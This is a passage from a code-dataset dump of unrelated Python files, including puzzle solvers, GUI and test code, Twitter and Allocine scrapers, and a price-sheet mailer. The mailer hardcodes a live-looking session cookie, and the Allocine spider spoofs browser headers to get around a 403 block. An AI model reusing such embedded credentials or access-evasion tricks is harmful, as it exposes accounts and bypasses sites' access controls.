Otherwise, the\n        csp should be in a goal state.\n        \"\"\"\n        # assignment complete: every variable has a value\n        if len(assignment) == len(csp.variables):\n            return assignment\n\n        # pick the next unassigned variable\n        var = select_unassigned_variable(assignment, csp)\n        # try each value of the variable's (ordered) domain\n        for val in order_domain_values(var, assignment, csp):\n            if csp.nconflicts(var, val, assignment) == 0:  # \"is 0\" tested identity, not equality\n                csp.assign(var, val, assignment)\n                # record prunings so they can be undone on failure\n                removals = csp.suppose(var, val)\n                if inference(csp, var, val, assignment, removals):\n                    # recurse on the extended assignment\n                    sol = backtrack(assignment)\n                    if sol is not None:\n                        return sol\n                csp.restore(removals)\n                csp.unassign(var, assignment)\n        return None\n\n    # Call with empty assignments, variables accessed\n    # through dynamic scoping (variables in outer\n    # scope can be accessed in Python)\n    result = backtrack({})\n    assert result is None or csp.goal_test(result)\n    return result\n","repo_name":"leyulin/CS550","sub_path":"A4/backtrack.py","file_name":"backtrack.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"9659942168","text":"# taken from https://stackoverflow.com/a/46096319/11009349\n\nfrom PySide6 import QtGui\nfrom PySide6.QtWidgets import QMainWindow, QTreeWidget, QTreeWidgetItem\n\n\nclass ViewTree(QTreeWidget):\n    def __init__(self, value, parent=None):\n        super().__init__(parent)\n        self.setHeaderLabel(\"Computation parameters\")\n\n        def fill_item(item, value):\n            def new_item(parent, text, val=None):\n                child = QTreeWidgetItem([text])\n                fill_item(child, val)\n                parent.addChild(child)\n                child.setExpanded(True)\n\n            if value is None:\n                return\n            elif isinstance(value, dict):\n                for key, val in sorted(value.items()):\n                    new_item(item, str(key), val)\n            elif isinstance(value, (list, tuple)):\n                for val in value:\n                    text = (\n                        str(val)\n                        if not isinstance(val, (dict, list, tuple))\n                        else \"[%s]\" % type(val).__name__\n                    )\n                    new_item(item, text, val)\n            else:\n                new_item(item, str(value))\n\n        fill_item(self.invisibleRootItem(), value)\n\n\nclass ComputedChannelInfoWindow(QMainWindow):\n    def __init__(self, signal, parent=None):\n        super().__init__(parent)\n        self.setCentralWidget(ViewTree(signal.computation, self))\n        self.setWindowTitle(f\"Computed channel {signal.name}\")\n        self.setMinimumSize(600, 400)\n        icon = QtGui.QIcon()\n        icon.addPixmap(QtGui.QPixmap(\":/info.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n        self.setWindowIcon(icon)\n","repo_name":"danielhrisca/asammdf","sub_path":"src/asammdf/gui/widgets/dict_to_tree.py","file_name":"dict_to_tree.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":542,"dataset":"github-code","pt":"61"}
{"seq_id":"23643845421","text":"class Tree:\n    def __init__(self, k, pancakes):\n        self.value = list(pancakes)\n        self.n = len(pancakes)\n        self.k = k\n        self.selections = self.n - k + 1\n        self.children = []\n        self.depth = 0\n        self.allSidesUp = False\n\n    def make_children(self):\n        for i in range(self.selections):\n            new_pancakes = self.value[:]\n            for j in range(self.k):\n                if new_pancakes[i+j] == \"+\":\n                    new_pancakes[i+j] = \"-\"\n                else:\n                    new_pancakes[i+j] = \"+\"\n            child = Tree(self.k, \"\".join(new_pancakes))\n            child.depth = self.depth + 1\n            self.children.append(child)\n            if \"\".join(new_pancakes) == \"+\"*self.n:\n                self.allSidesUp = True\n\n    def getValue(self):\n        return \"\".join(self.value)\n\n    def ifAllSideUp(self):\n        return self.allSidesUp\n\n    def print_children(self):\n        for child 
in self.children:\n print(\"Pancakes: \" + \"\".join(child.value))\n\ndef solution(root):\n toExplore = {root}\n visited = {root.getValue()}\n while len(toExplore) != 0:\n newExplore = set()\n for node in toExplore:\n node.make_children()\n if node.ifAllSideUp():\n return node.depth + 1\n for child in node.children:\n if child.getValue() not in visited:\n visited.add(child.getValue())\n newExplore.add(child)\n toExplore = newExplore\n return -1\n\nfile = open('input.txt')\ntests = int(file.readline())\ncases = []\nfor t in range(tests):\n cases.append(file.readline().strip().split(' '))\ntest = 0\nfor pancakes, k in cases:\n test += 1\n answer = 0\n if not len(pancakes)*\"+\" == pancakes:\n root = Tree(int(k), pancakes)\n answer = solution(root)\n if answer != -1:\n print(\"Case #{}: {}\".format(test, answer))\n else:\n print(\"Case #{}: IMPOSSIBLE\".format(test))\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3198.py","file_name":"3198.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9415789696","text":"import json\nimport pickle\n\n\ndef _check(context, loaded):\n names = set([x.get_attr('IFLA_IFNAME') for x in loaded])\n indices = set([x['index'] for x in loaded])\n assert names == {x.ifname for x in context.ndb.interfaces.dump()}\n assert indices == {x.index for x in context.ndb.interfaces.dump()}\n\n\ndef test_pickle(context):\n links = tuple(context.ipr.link('dump'))\n saved = pickle.dumps(links)\n loaded = pickle.loads(saved)\n _check(context, loaded)\n\n\ndef test_json(context):\n links = tuple(context.ipr.link('dump'))\n saved = json.dumps([x.dump() for x in links])\n msg_type = type(links[0])\n loaded = [msg_type().load(x) for x in json.loads(saved)]\n _check(context, loaded)\n\n\ndef test_dump(context):\n links = tuple(context.ipr.link('dump'))\n saved = [(type(x), x.dump()) for x in links]\n loaded = [x[0]().load(x[1]) for x in saved]\n _check(context, loaded)\n","repo_name":"svinota/pyroute2","sub_path":"tests/test_linux/test_integration/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"23643845421","text":"def isRecycled(int1, int2):\r\n str1 = str(int1)\r\n str2 = str(int2)\r\n if len(str1) != len(str2):\r\n return False\r\n\r\n for i in range(len(str1)):\r\n part1 = str1[:i]\r\n part2 = str1[i:]\r\n total = part2 + part1\r\n if total == str2:\r\n return True\r\n return False\r\n\r\n\r\na_file = open('C-small-attempt0.in')\r\nnumcases = int(a_file.readline())\r\n\r\nfor k in range(numcases):\r\n \r\n param = a_file.readline()\r\n params = param.split()\r\n start = int(params[0])\r\n end = int(params[1])\r\n counter = 0\r\n for i in range(start, end + 1):\r\n for j in range(i + 1, end+1):\r\n if isRecycled(i, j):\r\n counter += 1\r\n \r\n \r\n print(\"Case #\" + str(k + 1) + \":\", counter)\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1542.py","file_name":"1542.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8847026922","text":"import tweepy\nimport pymongo\nimport json\nimport sys\nimport time\n\nclass StdOutListener(tweepy.StreamListener):\n\n def __init__(self):\n self.logFile = \"\"\n 
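        # (editor's aside, hedged) on_data below inserts every raw tweet into
        # Mongo, so a stream reconnect can store the same tweet twice. One
        # hypothetical guard is a unique index created before streaming starts:
        #   collection.create_index("id_str", unique=True)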
self.collection = \"\"\n        self.backOff = None\n    \n    def setLogFile(self, arq):\n        self.logFile = arq\n    \n    def closeLogFile(self):\n        if ( (self.logFile != None) and (self.logFile != \"\") ):\n            self.logFile.close()\n    \n    def setCollection(self, collection):\n        self.collection = collection\n    \n    def setTimerBackOffToStream(self, backOff):\n        self.backOff = backOff\n    \n    def on_data(self, data): \n        if (self.collection == \"\"):\n            print (\"Error: use setCollection to set the mongo collection first\")\n            return\n\n        data = json.loads(data)\n        self.collection.insert(data)\n        self.backOff.reiniciarContadorTentativas()\n\n    def on_error(self, status):\n        self.logFile.write(\"\n\nerror:\"+str(status))\n        self.backOff.timeReconexao(status)\n\n\nclass TimerBackOffToStream(object):\n\n    def __init__(self):\n        self.tentativas = 1 # multiplication factor\n\n    def timeReconexao(self, HTTPerror=0):\n        '''\n        Back off to avoid getting the user's IP or credentials blocked.\n        '''\n        if (HTTPerror == 420):\n            time.sleep(60 * self.tentativas)\n        elif (self.tentativas == 1):\n            time.sleep(5)\n        else:\n            time.sleep(5 * self.tentativas * 2)\n        self.tentativas += 1\n\n    def setTentativas(self,incrementar):\n        self.tentativas += incrementar\n    \n    def reiniciarContadorTentativas(self):\n        self.tentativas = 1\n\nif __name__ == '__main__':\n    \n    '''\n    dependencies: tweepy and pymongo. Install them on your machine.\n    script written for Python 2; port it to Python 3.\n    '''\n    #Get your credentials on twitter at https://apps.twitter.com/\n    #Variables that contain the user credentials to access the Twitter API \n    Consumer_key = \"\"\n    Consumer_secret = \"\"\n    Access_token = \"\"\n    Access_token_secret = \"\"\n\n    backOff = TimerBackOffToStream() \n\n    #replace the log file name\n    arqLog = open(\"NOMEARQUIVO\",\"a\")\n    \n    while (True):\n        try:\n            #This handles Twitter authentication and the connection to the Twitter Streaming API\n            l = StdOutListener()\n            \n            #Define the mongo database and collection where the data will be saved\n            mongo = pymongo.MongoClient()\n            db = mongo['NOME DO BANCO MONGO']\n            collection = db['NOME DA COLECAO NO MONGO']\n            \n            l.setCollection(collection) \n            l.setLogFile(arqLog)\n            l.setTimerBackOffToStream(backOff)\n            \n            auth = tweepy.OAuthHandler(Consumer_key, Consumer_secret)\n            auth.set_access_token(Access_token, Access_token_secret)\n            stream = tweepy.Stream(auth, l)\n            \n            #search terms separated by commas. 
For a hashtag, include the # symbol.\n            termos = ['aecio','psdb']\n            #,'#agrevefracassou','#euvoutrabalhar','#brasiltrabalhador'\n            \n            #This line filters the Twitter stream to capture data by the hashtags\n            stream.filter(track=termos)\n\n        except:\n            print (\"except\")\n            arqLog.write(\"\nError: Exception:\"+str(sys.exc_info()[0]))\n            backOff.timeReconexao()\n    \n","repo_name":"labcores/p_crawler_labcores","sub_path":"twitterStream_tweepy.py","file_name":"twitterStream_tweepy.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"29782777686","text":"try:\n    f = open(\"p022_names.txt\", \"r\")\nexcept FileNotFoundError:\n    print(\"Couldn't find the file\")\n    exit()\nif f.mode == 'r':\n    contents = f.read()\nelse:\n    print(\"The file isn't open to read.\")\n    exit()\nf.close()\nnames = contents[1:len(contents)-1].split('\",\"')\nnames.sort()\nsumm = 0\nfor i in range(len(names)):\n    s = 0\n    for letter in names[i]:\n        s += ord(letter) - 64\n    summ += s * (i+1)\nprint(summ)\n","repo_name":"salmanchik1/Project_Euler","sub_path":"22/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"41357347349","text":"from urllib import request\nimport json\nimport xlwt\nimport datetime\nimport operationPath\nimport sendFile\nimport combineExcle\nimport time\nimport setBorder\nimport handleFile\nimport sendFile_special\n\n\n# fetch the API content\ndef get_html():\n    url = \"https://bshop.guanmai.cn/product/sku/get?level=1&category_id=\"\n    # A118200 wild vegetables, A6988 seasonal vegetables, A6982 meat/poultry, A6986 fruit\n    key = [\"A6988\",\"A6982\",\"A6986\"]\n    headers = {\n        \"Cookie\": \"cms_key=srfc; group_id=630; gr_user_id=7b087989-dc51-4066-94f6-bf064a0b05d2; 9beedda875b5420f_gr_session_id=0168e4b9-f768-4690-ba26-5564f1ee94e9; 9beedda875b5420f_gr_session_id_0168e4b9-f768-4690-ba26-5564f1ee94e9=true; Hm_lvt_d02cd7e3028015e0088f63c017c81147=1654602700; sessionid=rrdk63iop731j3ruvq8fadcp0ga3qf61; Hm_lpvt_d02cd7e3028015e0088f63c017c81147=1654602754; 9beedda875b5420f_gr_last_sent_sid_with_cs1=0168e4b9-f768-4690-ba26-5564f1ee94e9; 9beedda875b5420f_gr_last_sent_cs1=1801126; 9beedda875b5420f_gr_cs1=1801126\"\n    }\n    html = []\n    for i,j in enumerate(key):\n        newUrl = url + j\n        req = request.Request(url=newUrl, headers=headers)\n        res = request.urlopen(req)\n        html.append(res.read().decode(\"utf-8\", \"ignore\"))\n\n    # on Windows the response can come out garbled, so decode with gbk and use ignore to skip bytes that can't be handled\n    # on Linux the problem above does not occur and decode('utf-8') can be used directly\n    return html\n\ndef getStyle(stype):\n\n    # header style\n    if stype == \"title\":\n        # font format\n        style = xlwt.XFStyle()\n        titlefont = xlwt.Font()\n        titlefont.name = \"宋体\"\n        titlefont.height = 16 * 20\n        style.font = titlefont\n        # header cell format\n        align = xlwt.Alignment()\n        align.horz = 0x02\n        align.vert = 0x01\n        style.alignment = align\n        return style\n\n    # header style\n    if stype == \"title1\":\n        # font format\n        style = xlwt.XFStyle()\n        titlefont = xlwt.Font()\n        titlefont.name = \"宋体\"\n        titlefont.height = 14 * 20\n        style.font = titlefont\n        # header cell format\n        align = xlwt.Alignment()\n        align.horz = 0x02\n        align.vert = 0x01\n        style.alignment = align\n        return style\n    # cell format\n    if stype == \"cell\":\n        style = xlwt.XFStyle()\n        titlefont = xlwt.Font()\n        titlefont.name = \"宋体\"\n        titlefont.height = 11 * 20\n        style.font = titlefont\n        # cell alignment format\n        align = xlwt.Alignment()\n        align.vert = 0x01\n        style.alignment = align\n        return style\n\n\n# parse the json and write the content into the spreadsheet that is mailed out\ndef saveExcleOnDay(html):\n    now = 
\n    now = datetime.datetime.now().strftime('%Y-%m-%d')\n    weekday = datetime.datetime.now().weekday()\n\n    workbook = xlwt.Workbook() # open a workbook\n    # create a worksheet\n    worksheet = workbook.add_sheet(now + \"(\" + handleFile.getWeekDayName(weekday) + \")\")\n    for i in range(0,3):\n        first_col = worksheet.col(i*3) # get the first column of each 3-column block\n        first_col.width = 256 * 20 # set its width\n    tall_style = xlwt.easyxf('font:height 400') # set the row height\n    worksheet.write_merge(0, 0, 0, 8, \"幼鲜知价格表(\" + now + \") 单位:元/斤\",getStyle(\"title\"))\n    worksheet.write_merge(1, 1, 0, 2, \"幼鲜知蔬菜价格表\",getStyle(\"title1\"))\n    worksheet.write_merge(1, 1, 3, 5, \"幼鲜知肉禽价格表\",getStyle(\"title1\"))\n    worksheet.write_merge(1, 1, 6, 8, \"幼鲜知水果价格表\",getStyle(\"title1\"))\n    for i in range(0,2):\n        row = worksheet.row(i)\n        row.set_style(tall_style) # set the row height\n    for i,data in enumerate(html):\n        worksheet.write(2,i*3+0,\"品名\",getStyle(\"title1\"))\n        worksheet.write(2,i*3+1,\"价格\",getStyle(\"title1\"))\n        worksheet.write(2,i*3+2,\"单位\",getStyle(\"title1\"))\n        for j, row in enumerate(json.loads(data).get(\"data\")):\n            worksheet.write(j+3,i*3+0,row.get(\"name\"),getStyle(\"cell\"))\n            worksheet.write(j+3,i*3+1,row.get(\"std_sale_price\")/100,getStyle(\"cell\"))\n            worksheet.write(j+3,i*3+2,row.get(\"std_unit_name\"),getStyle(\"cell\"))\n            first_row = worksheet.row(j + 3)\n            first_row.set_style(tall_style) # set the row height\n    workbook.save(now+\"(\"+ handleFile.getWeekDayName(weekday)+ \")\" + \".xls\")\n\ndef main():\n    try:\n        print(\"小助手运行中......\")\n        while True:\n            today = datetime.datetime.now().weekday()\n            # normalise to the Friday ending this week, so only that week's data is sent\n            now = ((datetime.datetime.now())+datetime.timedelta(days= 4-today)).strftime('%Y-%m-%d')\n            weekday = 4\n            nowTime = time.strftime(\"%H:%M:%S\")\n            if time.strptime(nowTime, \"%H:%M:%S\").__ge__(time.strptime(\"08:30:00\", \"%H:%M:%S\")) and operationPath.containFile(datetime.datetime.now().strftime('%Y-%m-%d')+\"(\"+ handleFile.getWeekDayName(datetime.datetime.now().weekday())+ \")\"+ \".xls\"):\n                # save today's Excel file\n                saveExcleOnDay(get_html())\n                print(\"保存当天文件成功: \" + now)\n            if operationPath.containFile(str(now) + \"(\" + handleFile.getWeekDayName(weekday) + \")\" + \"--\") and operationPath.containFile(datetime.datetime.now().strftime('%Y-%m-%d') + \"(\" + handleFile.getWeekDayName(\n                    datetime.datetime.now().weekday()) + \")\" + \"--\"):\n                if (time.strptime(nowTime, \"%H:%M:%S\").__ge__(\n                        time.strptime(\"08:30:00\", \"%H:%M:%S\")) and datetime.datetime.now().weekday() >= 4):\n                    # merge the files collected this week\n                    print(\"合并当周获取的文件\")\n                    title = combineExcle.combineExcle()\n                    # apply the border styles\n                    sheets = handleFile.getDatePath(False)\n                    setBorder.getFileAndSetStype(title, sheets)\n                    # send to the designated mailbox (shared area)\n                    msg = title + \"幼鲜知价格表\"\n                    print(\"发送至指定邮箱 到 公共区域\")\n                    message = sendFile.message_config(msg)\n                    sendFile.send_mail(message)\n                    print(\"发给小主子.....\")\n                    msg = msg + \"准备好啦\"\n                    message = sendFile_special.message_config(msg)\n                    sendFile_special.send_mail(message)\n                    print(\"当周数据完成!!! \" + title)
\" + title)\n print(\"准备删除上周文件....\")\n operationPath.removeWeekFile()\n print(\"删除成功...\")\n except Exception as e:\n print(\"获取失败!!!!!!\")\n print(e)\n\nif __name__ == '__main__':\n main()","repo_name":"XiaoCaicai777/Little-assistant","sub_path":"getFruitTest.py","file_name":"getFruitTest.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20789400285","text":"from re import search\nfrom urllib.parse import urljoin\nfrom scrapy import Request, Spider\nfrom ..items import ReviewsAllocineItem\n\nclass SpiderReviewsAllocine(Spider):\n name = \"reviews_allocine\"\n domain = \"http://www.allocine.fr/\"\n \n # Le nombre de page limite (Nombre de films parcourues ~= 15*limit)\n limit = 3000\n\n # Nombre de commentaires par page\n reviews_per_page = 15\n\n # \"entry_url\" correspond à la section \"Tous les films\"\n entry_url = \"http://www.allocine.fr/films/\"\n\n # On a une erreur 403 quand on d'atteindre la page des commentaires sans un 'referer' et un 'user-agent' différent de celui de scrapy\n headers = {'referer': domain, 'user-agent':'Mozilla/5.0 (X11; Linux x86_64)'}\n\n def start_requests(self):\n for page in range(1, self.limit+1):\n url = urljoin(self.entry_url, f\"?page={page}\")\n\n yield Request(url=url, callback=self.parse_films, headers=self.headers)\n\n def parse_films(self, response):\n \"\"\"\n Cette fontion parse la liste des film de la section 'Tous les films'\n Pour chacun des film de la section on va chercher le lien qui dirige sur la \n page où se trouvent les commentaires des spectateurs : \"http://www.allocine.fr/film/fichefilm-{id_film}/critiques/spectateurs/\"\n l'identifiant du film se trouve dans le lien qui mene à la page 'détails' du film : '/film/fichefilm_gen_cfilm={id_film}.html'\n\n Args:\n response (Response): L'objet scrapy.Response qui correspond à la réponse de la requête faite dans 'start_requests'\n \"\"\"\n # Liste des film de la page\n film_cards = response.css(\"main section.section ul > li.mdl > div.card\")\n for film_card in film_cards: \n title = film_card.css(\"div.meta > h2.meta-title a::text\").extract_first()\n uri = film_card.css(\"div.meta > h2.meta-title a::attr(href)\").extract_first()\n\n # On veut recupérer l'identifiant du film 268644 dans '/film/fichefilm_gen_cfilm=268644.html'\n id_film = search(r'/film/fichefilm_gen_cfilm=(.*?).html', uri).group(1)\n url_reviews = f\"{self.domain}film/fichefilm-{id_film}/critiques/spectateurs/\"\n\n yield Request(url=url_reviews, callback=self.parse_reviews, meta={'title': title, 'id_film': id_film, 'page': 1}, headers=self.headers)\n\n\n def parse_reviews(self, response):\n \"\"\"\n Cette fonction parse les commentaires laissés par les spectateurs\n\n Args:\n response (Response): L'objet scrapy.Response qui correspond à la réponse de la requête faite dans 'start_requests'\n \"\"\"\n review_cards = response.css(\"section.section div.review-card\")\n for review_card in review_cards:\n review = review_card.css(\"div.content-txt::text\").extract_first()\n review = review.strip()\n stars = review_card.css(\"span.stareval-note::text\").extract_first()\n # Pour avoir la note (nombre d'étoiles) en float\n stars = float(stars.replace(\",\", \".\"))\n \n item = ReviewsAllocineItem()\n\n item['title'] = response.meta['title']\n item['stars'] = stars\n item['review'] = review\n\n yield item\n \n # Pagination\n if response.meta['page'] == 1:\n total_reviews = search(r'\\d+', 
response.css(\"h2.titlebar-title::text\").extract_first())\n total_reviews = int(total_reviews.group(0)) if total_reviews else 0\n \n # On lance une requete pour chacune des pages\n # +1 pour le reste et +1 parce que l'intervalle de range est ouvert à droite\n for page in range(2, int(total_reviews/self.reviews_per_page)+2):\n url = urljoin(response.url, f\"?page={page}\")\n response.meta['page'] = 2\n \n yield Request(url=url, callback=self.parse_reviews, meta=response.meta, headers=self.headers)\n \n\n\n \n","repo_name":"FridIsar/films-data-science","sub_path":"autres/sentiment analysis/datasets/spiders/reviews_allocine.py","file_name":"reviews_allocine.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32196708369","text":"import ctypes\nfrom typing import List, Tuple, Type\n\nfrom .ints import (\n Int8,\n Int16,\n Int32,\n Int64,\n IntTypeBase,\n MultipliedIntTypeBase,\n UInt8,\n UInt16,\n UInt32,\n UInt64,\n)\n\n__all__ = [\"Structure\"]\n\nmapping = {\n Int8: ctypes.c_byte,\n UInt8: ctypes.c_ubyte,\n Int16: ctypes.c_short,\n UInt16: ctypes.c_ushort,\n Int32: ctypes.c_int,\n UInt32: ctypes.c_uint,\n Int64: ctypes.c_longlong,\n UInt64: ctypes.c_ulonglong,\n}\n\n\nclass Structure(object):\n _pack_ = 0\n _fields_: List[Tuple[str, Type]] = []\n\n def __init__(self):\n self.subfields, fields = {}, []\n for field, type_ in self._fields_:\n if isinstance(type_, int):\n type_ = ctypes.c_char * type_\n elif issubclass(type_, IntTypeBase):\n if issubclass(type_, MultipliedIntTypeBase):\n type_ = mapping[type_.int_type] * type_.mul\n else:\n type_ = mapping[type_]\n elif issubclass(type_, Structure):\n # Keep track, likely for Python GC purposes.\n self.subfields[field] = type_()\n type_ = self.subfields[field].Klass\n fields.append((field, type_))\n\n class Klass(ctypes.Structure):\n _pack_ = self._pack_\n _fields_ = fields\n\n def as_dict(self):\n return self._parent_.as_dict()\n\n self.Klass = Klass\n self.Klass._parent_ = self\n\n def __getattr__(self, item):\n ret = getattr(self._values_, item)\n if isinstance(ret, ctypes.Structure):\n ret._parent_._values_ = ret\n\n # Allow caller to omit the [:] part.\n if hasattr(ret, \"__getitem__\"):\n return ret[:]\n return ret\n\n def as_dict(self, values=None):\n ret = {}\n for field, type_ in self._fields_:\n value = getattr(values or self._values_, field)\n if isinstance(type_, type) and issubclass(type_, Structure):\n ret[field] = value._parent_.as_dict(value)\n elif hasattr(value, \"__getitem__\"):\n ret[field] = value[:]\n else:\n ret[field] = value\n return ret\n\n @classmethod\n def sizeof(cls):\n return ctypes.sizeof(cls().Klass)\n\n @classmethod\n def from_buffer_copy(cls, buf):\n obj = cls()\n obj._values_ = obj.Klass.from_buffer_copy(buf)\n return obj\n\n @classmethod\n def parse(cls, buf):\n return cls.from_buffer_copy(buf)\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"} +{"seq_id":"30991166098","text":"from py_avataaars import PyAvataaar \r\n\r\navatar = PyAvataaar()\r\navatar.render_png_file(\"AVATAR_1.png\")\r\n\r\nimport py_avataaars as pa \r\n\r\navatar = pa.PyAvataaar(style=pa.AvatarStyle.CIRCLE,\r\n skin_color=pa.SkinColor.LIGHT,\r\n hair_color=pa.HairColor.AUBURN,\r\n facial_hair_type=pa.FacialHairType.MOUSTACHE_MAGNUM,\r\n 
top_type=pa.TopType.SHORT_HAIR_SHAGGY_MULLET,\r\n mouth_type=pa.MouthType.SCREAM_OPEN,\r\n eye_type=pa.EyesType.SQUINT,\r\n eyebrow_type=pa.EyebrowType.RAISED_EXCITED_NATURAL,\r\n nose_type=pa.NoseType.DEFAULT,\r\n accessories_type=pa.AccessoriesType.PRESCRIPTION_02,\r\n clothe_type=pa.ClotheType.HOODIE,\r\n clothe_graphic_type=pa.ClotheGraphicType.BAT,)\r\n\r\navatar.render_png_file(\"AVATAR_2.png\")\r\n#© 2021 Proxlight, Inc. All rights reserved.","repo_name":"Proxlight/Create-Avatars","sub_path":"Avatar.py","file_name":"Avatar.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"14992904828","text":"import sys\n\nfrom functools import reduce\nfrom operator import add, mul\n\ndef hex_to_binary(input):\n output = bin(int(input, 16))[2:]\n return \"0\"*(len(input)*4 - len(output)) + output\n\ndef parse_packet(binary):\n # Returned values (includes composition of sub-packets)\n numbers = []\n cur_offset = 0\n sum_versions = 0\n\n V = int(binary[:3], 2)\n sum_versions += V\n T = int(binary[3:6], 2)\n\n # Type of 4 represents a literal number.\n if T == 4:\n all_parts = []\n start = 6\n while True:\n all_parts.append(binary[start+1:start+5])\n if binary[start] == \"0\":\n break\n start = start + 5\n numbers.append(int(\"\".join(all_parts), 2))\n return numbers, start + 5, V\n else:\n I = int(binary[6], 2)\n if I == 0:\n L = int(binary[7:22], 2)\n cur_offset = 22\n while cur_offset < 22 + L:\n vals, offset, version = parse_packet(binary[cur_offset:])\n sum_versions += version\n cur_offset = cur_offset + offset\n for val in vals:\n numbers.append(val)\n else:\n L = int(binary[7:18], 2)\n i = 0\n cur_offset = 18\n while i < L:\n vals, offset, version = parse_packet(binary[cur_offset:])\n sum_versions += version\n cur_offset = cur_offset + offset\n i += 1\n for val in vals:\n numbers.append(val)\n if T == 0:\n return [reduce(add, numbers)], cur_offset, sum_versions\n elif T == 1:\n return [reduce(mul, numbers)], cur_offset, sum_versions\n elif T == 2:\n return [reduce(min, numbers)], cur_offset, sum_versions\n elif T == 3:\n return [reduce(max, numbers)], cur_offset, sum_versions\n elif T == 5:\n return [1 if numbers[0] > numbers[1] else 0], cur_offset, sum_versions\n elif T == 6:\n return [1 if numbers[0] < numbers[1] else 0], cur_offset, sum_versions\n elif T == 7:\n return [1 if numbers[0] == numbers[1] else 0], cur_offset, sum_versions\n\ndef main():\n for line in sys.stdin:\n vals, offset, sum_versions = parse_packet(hex_to_binary(line.strip()))\n print(vals[0])\n # print(sum_versions)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"teejusb/advent-of-code-2021","sub_path":"16/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14650363042","text":"import turtle\r\nimport random\r\n\r\npen = turtle.Turtle()\r\nturtle.colormode(255)\r\npen.speed(\"fastest\")\r\npen.hideturtle()\r\n#pen.width = 50\r\n\r\n#rgb_color = []\r\n#colors = colorgram.extract(\"20_001.jpg\", 10)\r\n#for color in colors:\r\n# r = color.rgb.r\r\n# g = color.rgb.g\r\n# b = color.rgb.g\r\n# new_colors = (r, g, b)\r\n# rgb_color.append(new_colors)\r\n\r\n#print(rgb_color)\r\n\r\ncolors = [(199, 175, 175), (124, 36, 36), (168, 106, 106), (222, 224, 224), (186, 158, 158), (6, 57, 57), (109, 67, 67)]\r\n\r\ndef clors():\r\n # for spec_color in colors:\r\n color = random.choice(colors)\r\n 
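    # \"color\" now holds one RGB tuple drawn at random from the sampled palette above\r\n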
return color\r\n\r\ndef draw(space, x, y):\r\n #color = ()\r\n for i in range(y):\r\n for j in range(x):\r\n pen.dot(20, clors())\r\n pen.penup()\r\n #move forward by a specified distance \"space\"\r\n pen.forward(50)\r\n pen.pendown()\r\n pen.penup()\r\n pen.back(space * x)\r\n pen.lt(90)\r\n pen.forward(space)\r\n pen.rt(90)\r\n pen.pendown()\r\n\r\n\r\npen.setheading(225)\r\npen.penup()\r\npen.forward(7 * 50)\r\npen.setheading(0)\r\npen.pendown()\r\n\r\ndraw(50, 10, 10)\r\nscreen = turtle.Screen()\r\nscreen.exitonclick()\r\n\r\n","repo_name":"umole/heist-painting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40130247357","text":"# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428195607.203475\n_enable_loop = True\n_template_filename = 'C:\\\\Python34\\\\Projects\\\\CHF\\\\homepage\\\\templates/rentable_item.html'\n_template_uri = 'rentable_item.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['title', 'header', 'content']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def title():\n return render_title(context._locals(__M_locals))\n all_item = context.get('all_item', UNDEFINED)\n def header():\n return render_header(context._locals(__M_locals))\n def content():\n return render_content(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'title'):\n context['self'].title(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'header'):\n context['self'].header(**pageargs)\n \n\n return ''\n finally:\n 